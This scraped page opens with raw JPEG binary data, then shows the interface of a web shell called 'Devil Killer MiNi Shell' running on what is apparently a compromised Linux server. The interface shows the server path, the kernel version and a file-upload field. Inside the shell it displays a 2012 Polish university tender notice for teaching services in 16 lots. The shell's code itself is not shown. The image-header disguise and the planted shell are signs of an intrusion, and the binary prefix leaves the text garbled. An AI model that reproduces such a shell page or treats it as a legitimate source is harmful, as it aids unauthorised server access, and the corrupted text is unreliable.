JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120702/143079-N-2012.html

<p class="kh_header"><b>Lublin: Prowadzenie zajęć dydaktycznych w ramach projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy</b><br>
<b>Numer ogłoszenia: 143079 - 2012; data zamieszczenia: 02.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Marii Curie-Skłodowskiej, Centrum Badań Naukowych i Funduszy Zewnętrznych , pl. Marii Curie-Skłodowskiej 5, 20-031 Lublin, woj. lubelskie, tel. 81 537 52 07, faks 81 537 54 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.przetargi.umcs.lublin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć dydaktycznych w ramach projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenia zajęć dydaktycznych na 16 innowacyjnych specjalnościach/specjalizacjach na Wydziale Humanistycznym w ramach projektu UMCS dla rynku pracy i gospodarki opartej na wiedzy oraz przygotowanie kompletu materiałów dydaktycznych do prowadzonych zajęć, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.	Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających. Wartość zamówienia uzupełniającego nie przekroczy 50% wartości zamówienia podstawowego i polegać będzie na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią Wykonawcy, którzy wykażą, że osoby realizujące zamówienie posiadają wykształcenie co najmniej wyższe magisterskie (część 2, 7, 10, 11, 12, 13) lub posiadają stopień naukowy co najmniej doktor z zakresu nauk humanistycznych lub ścisłych (część 1, 3) lub posiadają stopień naukowy co najmniej doktor z zakresu nauk humanistycznych (część 4, 5,) lub posiadają stopień naukowy co najmniej doktor z zakresu nauk humanistycznych w zakresie językoznawstwa [z uwzględnieniem języka serbskiego] (część 6) lub posiadają stopień naukowy co najmniej doktor sztuki filmowej (część 8, 9) lub posiadają wykształcenie co najmniej wyższe magisterskie - kierunek historia (część 14) lub posiadają wykształcenie co najmniej wyższe magisterskie - kierunek historia specjalność archiwalna/archiwistyczna udokumentowane wykształcenie, co najmniej podyplomowe w zakresie informatyki (część 15) lub posiadają wykształcenie co najmniej wyższe magisterskie - specjalność/kierunek turystyka (część 16).
Warunek dotyczący posiadania doświadczenia praktycznego spełnią Wykonawcy, którzy w odniesieniu do: Części 1 posiadają: 1. dodatkowo wykształcenie informatyczne, matematyczno-informatyczne i/lub ukończone kursy i szkolenia z zakresu nowoczesnych technologii informatycznych, 2. min. 100 godzin doświadczenia w prowadzeniu przedmiotów informatycznych/ prowadzeniu kursów i szkoleń dla dorosłych z zakresu: tworzenie stron i aplikacji internetowych, pozycjonowanie stron, struktura strony internetowej, podstawowe języki projektowania stron), 3. znajomość języka programowania Python, framework u do tworzenia aplikacji www Django. Części 2 posiadają: 1.  minimum trzyletnie doświadczenie w pracy dydaktycznej na uczelni wyższej w zakresie przedmiotów z zakresu edytorstwa komputerowego, internetowego i twórczego projektowania w mediach (m.in. elektronicznych), 2. minimum 100 godzinne doświadczenie w prowadzeniu laboratoryjnych zajęć z zakresu szkolenia komputerowego, 3. doświadczenie zawodowe w zakresie projektowania graficznego (wykonanie min. jednego, autorskiego projektu graficznego np. logotyp); 4. znajomość i doświadczenie dydaktyczne w zakresie programów: Photoshop, InDesign, Illustrator, Gimp, Excel, Access, Word, PowerPoint. Części 3 posiadają: 1. min. 100 godzin doświadczenia w prowadzeniu kursów i szkoleń dla dorosłych w zakresie różnorodnego zastosowania TI (w szczególności grafika komputerowa, infografika, webdesign, tworzenie aplikacji webowych, DTP, etc.), 2. min. 3 letnie doświadczenie zawodowe zdobyte podczas współpracy z firmami i przedsiębiorcami (w szczególności  doradztwo z zakresu wykorzystania technologii informatycznych w przedsiębiorstwie, budowanie e-wizerunku firmy, tworzenie wizualizacji firmy oraz projektowanie stron internetowych, promocja i e-promocja produktów i usług), 3. min. 3 letnia współpraca z agencjami reklamowymi, drukarniami, wydawnictwami oraz biurami projektowymi w zakresie projektowania i wykonawstwa materiałów drukowanych i na wyświetlacze z wykorzystaniem nowoczesnych technik graficznych i technologii; 4. znajomość języka programowania Python, framework u do tworzenia aplikacji www Django. Części 4 posiadają: 1) co najmniej 2 publikacje z zakresu teorii edytorstwa (z zakresu teorii edytorskiej, metodologicznych problemów dyscypliny) oraz edycje krytyczne dzieł literackich; 2) minimum roczne doświadczenie w pracy w zespole redakcyjnym przygotowującym edycję krytyczną, praca o charakterze samodzielnym, potwierdzona publikacją/publikacjami, 3) realizacja zadań naukowych w zakresie edytorskim wraz z  publikacją/wystąpieniem konferencyjnym potwierdzającym przeprowadzenie badań, 4) minimum 3-letnie doświadczenie dydaktyczne w zakresie tekstologii i edytorstwa. Części 5 posiadają: 1. minimum 5-letnie, doświadczenie dydaktyczne związane z prowadzeniem wykładów i konwersatoriów z pragmatyki językowej, wiedzy o komunikacji językowej, języka mediów, public relations i reklamy, 2. przygotowanie minimum jednego programu nauczania i/lub sylabusa z zakresu różnych form komunikacji językowej i pragmatyki językowej, 3. opublikowanie przynajmniej 5 prac z zakresu pragmatyki językowej i/ lub języka komunikacji społecznej. Części 6 posiadają: 1. Biegła znajomość języka serbskiego poświadczona ukończeniem studiów magisterskich w zakresie języka serbskiego. 2. Minimum 5 letni staż pracy dydaktycznej  związanej z nauczaniem języka serbskiego w systemie szkolnictwa wyższego. 3. minimum 3 publikacje z zakresu językoznawstwa serbskiego i/lub słowiańskiego językoznawstwa porównawczego z uwzględnieniem języka serbskiego. Części 7 posiadają: 1. minimum 5-letnie doświadczenie w pracy w radio, 2. autor min. 10 audycji radiowych, 3. minimum 30-godzinne doświadczenie w prowadzeniu zajęć dydaktycznych lub szkoleń dla osób dorosłych z zakresu zapisu dźwięku. Części 8 posiadają: 1. min. 10-letni staż pracy jako operator, 2. autor zdjęć do min. 10 filmów, 3. minimum 100-godzinne doświadczenie w prowadzeniu zajęć dydaktycznych lub szkoleń dla osób dorosłych z zakresu wideozapisu. Części 9 posiadają: 1. minimum 100-godzinne doświadczenie w prowadzeniu zajęć dydaktycznych lub szkoleń dla osób dorosłych z zakresu warsztatów audiowizualnych, 2. reżyser min. 10 filmów dokumentalnych lub programów telewizyjnych lub spektakli teatralnych. Części 10 posiadają: 1. minimum 50- godzinne doświadczenie w prowadzeniu zajęć dydaktycznych lub szkoleń dla osób dorosłych z zakresu mniejszości narodowych; 2. autor lub współautor min. 5 publikacji i/lub artykułów naukowych (w tym obowiązkowo min. 2 o zasięgu międzynarodowym) o tematyce mniejszości narodowych, 3. wiedza z zakresu specyfiki kulturowej mniejszości Litwińskiej. Części 11 posiadają: 1. minimum 5 lat doświadczenia, praktyki w zakresie pisania komercyjnych i niekomercyjnych projektów społecznych na rzecz mniejszości narodowych, 2. udział w minimum 5 projektach społeczno-kulturowych (w tym minimum raz jako koordynator i/lub kierownik i/lub dyrektor projektu). Części 12 posiadają: 1. minimum 5 letnie doświadczenie zawodowe w pracy w instytucjach kultury; 2. posiadanie wiedzy z zakresu typologii placówek kulturalnych oraz pełnionych przez nie funkcji, 3. posiadanie wiedzy z zakresu kierunków polityki kulturalnej państwa i jednostek samorządowych. Części 13 posiadają: 1. praca w charakterze wykładowcy akademickiego  min. 2 lata (w tym zajęcia z: marketingu, zarządzania marką, marki miasta/miejsca/regionu; 2. minimum 50 godzinne doświadczenie w prowadzeniu zajęć dydaktycznych lub szkoleń z zakresu zarządzania marką dla osób dorosłych; 3. autor min. 15 artykułów i/lub publikacji, i/lub wystąpień konferencyjnych z zakresu PR/marketingu/marki (w tym min. 2 międzynarodowych); 4. wiedza z zakresu marketingu kultury poparta doświadczeniem zawodowym; 5. doświadczenie we współpracy z instytucjami kultury w zakresie marketingu i PR. Części 14 posiadają: 1. praca w charakterze nauczyciela akademickiego lub uczestnika studiów doktoranckich - min. 2 lata, 2. publikacje i/lub udział w konferencjach naukowych w zakresie rekonstrukcji historycznych [min. 2], 3. doświadczenie w prowadzeniu zajęć, kursów, wykładów na temat rekonstrukcji historycznych (minimum 30 godzin dydaktycznych), 4. praktyczne uczestnictwo w ruchu rekonstrukcyjnym, 5. doświadczenie w organizowaniu i zarządzaniu grupami rekonstrukcyjnymi oraz prowadzeniu imprez o charakterze historyczno-edukacyjnym. Części 15 posiadają: 1. praca w charakterze wykładowcy akademickiego min. 2 lata, 2. minimum 100 godzin doświadczenia jako trener w zakresie archiwistyki, zarządzania dokumentacją lub record s management. Części 16 posiadają: 1. organizator turystyki (min. pięcioletnie doświadczenie w organizacji imprez turystycznych krajowych i zagranicznych), 2. pilot wycieczek (min. pięcioletnie doświadczenie w obsłudze imprez turystycznych krajowych i zagranicznych), 3.  nauczyciel z zakresu przedmiotu (przedmiot / wymagana liczba przeprowadzenia zajęć)  - Obsługa ruchu turystycznego / min. 300 godz. - Tworzenie produktu turystycznego / min. 400 godz. - Marketing turystyki / min. 200 godz., 4. Doświadczenie w prowadzeniu zajęć (trener / ekspert) z zakresu obsługi ruchu turystycznego i marketingu w turystyce z pracownikami branży turystycznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;
2) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy;
3) zmiany uzasadnione okolicznościami, o których mowa w art. 3571 §1 Kodeksu cywilnego; 
4) gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SIWZ.
Warunkiem takiej zmiany jest wystąpienie okoliczności, których nie można było wcześniej przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.przetargi.umcs.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Marii Curie-Skłodowskiej w Lublinie, Pl. Marii Curie Skłodowskiej 5, Biuro Projektu ul. Sowińskiego 12 (pokój 9), 20-040 Lublin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2012 godzina 11:00, miejsce: Uniwersytet Marii Curie-Skłodowskiej w Lublinie, Pl. Marii Curie Skłodowskiej 5, Biuro Projektu ul. Sowińskiego 12 (pokój 9), 20-040 Lublin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone jest w ramach realizacji projektu: UMCS dla rynku pracy i gospodarki opartej na wiedzy, nr POKL.04.01.01-00-362/10 współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Programowanie komputerowe, specjalność E-edytorstwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Programowanie komputerowe, specjalność E-edytorstwo, forma prowadzenia zajęć: ćwiczenia stacjonarne, ćwiczenia online Liczba prowadzonych zajęć: 45 godzin (w tym 15 online) x 2 grupy (razem: 90 godzin) oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Twórcze projektowanie, specjalność E-edytorstwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Twórcze projektowanie, specjalność E-edytorstwo, forma prowadzenia zajęć: ćwiczenia stacjonarne, ćwiczenia online Liczba prowadzonych zajęć: 15 godzin (w tym 5 online) x 2 grupy (razem: 30 godzin) oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Infografika i grafika komputerowa, specjalność E-edytorstwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Infografika i grafika komputerowa, specjalność E-edytorstwo, forma prowadzenia zajęć: ćwiczenia stacjonarne, ćwiczenia online. Liczba prowadzonych zajęć: 45 godzin (w tym 15 online) x 2 grupy (razem: 90 godzin) oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Praktyki redakcyjne, specjalność E-edytorstwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Praktyki redakcyjne, specjalność E-edytorstwo, forma prowadzenia zajęć: ćwiczenia stacjonarne, ćwiczenia online. Liczba prowadzonych zajęć: 30 godzin x 2 grupy (razem: 60 godzin) oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Pragmatyka językowa, specjalność Komunikacja urzędowa i biznesowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prowadzenie zajęć z przedmiotu Pragmatyka językowa, specjalność Komunikacja urzędowa i biznesowa, forma prowadzenia zajęć: ćwiczenia stacjonarne. Liczba prowadzonych zajęć: 30 godzin x 2 grupy (razem: 60 godzin) oraz przygotowanie kompletu materiałów dydaktycznych z zakresu prowadzonych zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Prowadzenie zajęć z przedmiotu Lektorat Języka Serbskiego, specjalność Bałkanistyka.</p>
